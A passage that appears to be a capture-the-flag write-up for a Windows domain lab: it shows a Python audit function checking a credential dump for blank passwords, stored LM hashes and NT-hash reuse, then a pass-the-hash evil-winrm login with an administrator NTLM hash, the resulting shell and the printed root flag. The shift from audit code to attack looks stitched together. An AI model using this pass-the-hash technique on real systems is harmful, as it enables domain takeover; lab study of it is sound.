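def audit(records):
    """Blank passwords, LM hashes still stored, and NT-hash reuse among user accounts."""
    blank = [r["user"] for r in records if r["nt"] == EMPTY_NT]
    lm_stored = [r["user"] for r in records if r["lm"] != EMPTY_LM]
    by_hash = defaultdict(list)
    for r in records:
        if not r["user"].endswith("$"):  # machine accounts have random passwords; skip
            by_hash[r["nt"]].append(r["user"])
    reuse = {h: sorted(users) for h, users in by_hash.items() if len(users) > 1}
    return {"blank_password": blank, "lm_hash_stored": lm_stored, "reuse": reuse}


if __name__ == "__main__":
    result = audit(parse_dump(SAMPLE_DUMP))
    print("blank password:", result["blank_password"])
    print("LM hash stored:", result["lm_hash_stored"])
    for h, users in result["reuse"].items():
        print("same NT hash", h, "->", users)
```

Guest comes back as the only blank password, no account stores an LM hash, and the constructed svc_test line shares Administrator's NT hash. Any such reuse between a privileged and a service account is a one-hop path to Domain Admin; a dump that includes the krbtgt hash, as this one does, also means the krbtgt password should be reset twice after the incident.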
As we have the NTLM hash of the administrator user, we can get a shell. Then, all we have to do is reap the harvest and take the root flag.
evil-winrm -i 10.10.10.192 -u 'administrator' -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
4375a629c7c67c8e29db269060c955cb